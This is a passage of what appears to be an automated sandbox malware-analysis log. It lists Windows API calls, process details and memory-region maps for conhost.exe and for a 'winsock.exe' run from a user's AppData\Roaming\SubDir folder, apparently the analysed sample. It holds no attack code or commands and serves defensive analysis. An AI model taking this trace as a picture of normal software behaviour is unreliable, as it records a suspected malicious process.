RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c7610) returned 0x10 [0178.149] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c7610) returned 1 [0178.149] GetProcessHeap () returned 0x47c0000 [0178.150] GetProcessHeap () returned 0x47c0000 [0178.150] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c27b8) returned 1 [0178.150] GetProcessHeap () returned 0x47c0000 [0178.150] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c27b8) returned 0x14 [0178.150] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c27b8) returned 1 [0178.150] GetProcessHeap () returned 0x47c0000 [0178.150] GetProcessHeap () returned 0x47c0000 [0178.150] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7640) returned 1 [0178.150] GetProcessHeap () returned 0x47c0000 [0178.150] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c7640) returned 0x10 [0178.150] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c7640) returned 1 [0178.150] exit (_Code=0) Thread: id = 130 os_tid = 0x750 Process: id = "10" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x36fe2000" os_pid = "0x1090" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x1058" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1429 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1430 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1431 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1432 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1433 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1434 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1435 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1436 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1437 start_va = 0x7ff7a29a0000 end_va = 0x7ff7a29b0fff monitored = 0 entry_point = 0x7ff7a29a16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1438 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1439 start_va = 0xe0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1440 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1441 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1442 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1443 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1444 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1445 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1446 start_va = 0x90000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1447 start_va = 0x6c0000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1448 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1449 start_va = 0x7ffb1cba0000 end_va = 0x7ffb1cbf8fff monitored = 0 entry_point = 0x7ffb1cbafbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1450 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1451 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1452 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1453 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1454 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1455 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1456 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1457 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1458 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1459 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1460 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1461 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1463 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1464 start_va = 0x6c0000 end_va = 0x847fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 1465 start_va = 0x850000 end_va = 0x850fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 1466 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 1467 start_va = 0x890000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1468 start_va = 0xa20000 end_va = 0x1e1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 1486 start_va = 0x860000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1488 start_va = 0x1e20000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 1489 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1490 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1491 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1492 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1493 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1494 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1495 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1500 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1501 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1502 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1512 start_va = 0x1e60000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1529 start_va = 0x1ef0000 end_va = 0x2226fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1531 start_va = 0x2230000 end_va = 0x2445fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 1532 start_va = 0x2450000 end_va = 0x2664fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 1533 start_va = 0x2670000 end_va = 0x2784fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 1534 start_va = 0x2790000 end_va = 0x29abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 1535 start_va = 0x29b0000 end_va = 0x2abafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Thread: id = 124 os_tid = 0x10ac Thread: id = 125 os_tid = 0x10b0 Thread: id = 127 os_tid = 0x10d8 Process: id = "11" image_name = "winsock.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir\\winsock.exe" page_root = "0x36eaf000" os_pid = "0x10b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x820" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1469 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1470 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1471 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1472 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1473 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1474 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1475 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1476 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1477 start_va = 0x400000 end_va = 0x45dfff monitored = 1 entry_point = 0x4587be region_type = mapped_file name = "winsock.exe" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir\\winsock.exe") Region: id = 1478 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1479 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1480 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1481 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1482 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1483 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 1485 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1496 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1497 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1498 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1499 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1503 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1504 start_va = 0x4a0000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1505 start_va = 0x6d350000 end_va = 0x6d3a8fff monitored = 1 entry_point = 0x6d360780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 1506 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1507 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1508 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1509 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1510 start_va = 0x640000 end_va = 0x6fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1511 start_va = 0x700000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1516 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1517 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1518 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1519 start_va = 0x4a0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1520 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1521 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1522 start_va = 0x8f0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 1523 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1524 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1525 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1526 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1527 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1528 start_va = 0x800000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1530 start_va = 0x6d2d0000 end_va = 0x6d348fff monitored = 1 entry_point = 0x6d2df82a region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 1536 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1537 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1538 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1539 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1540 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1541 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 1542 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1543 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1544 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1545 start_va = 0x4e0000 end_va = 0x537fff monitored = 1 entry_point = 0x5387be region_type = mapped_file name = "winsock.exe" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir\\winsock.exe") Region: id = 1546 start_va = 0xa90000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 1547 start_va = 0xc20000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 1548 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1549 start_va = 0x6dd00000 end_va = 0x6dd07fff monitored = 0 entry_point = 0x6dd017b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1550 start_va = 0x2020000 end_va = 0x26d0fff monitored = 1 entry_point = 0x2035d20 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 1551 start_va = 0x6cb70000 end_va = 0x6d220fff monitored = 1 entry_point = 0x6cb85d20 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 1552 start_va = 0x6ca70000 end_va = 0x6cb64fff monitored = 0 entry_point = 0x6cac4160 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll") Region: id = 1568 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1569 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1570 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1636 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1637 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1638 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1639 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1640 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1641 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1642 start_va = 0x2020000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 1643 start_va = 0x800000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1644 start_va = 0x8e0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = 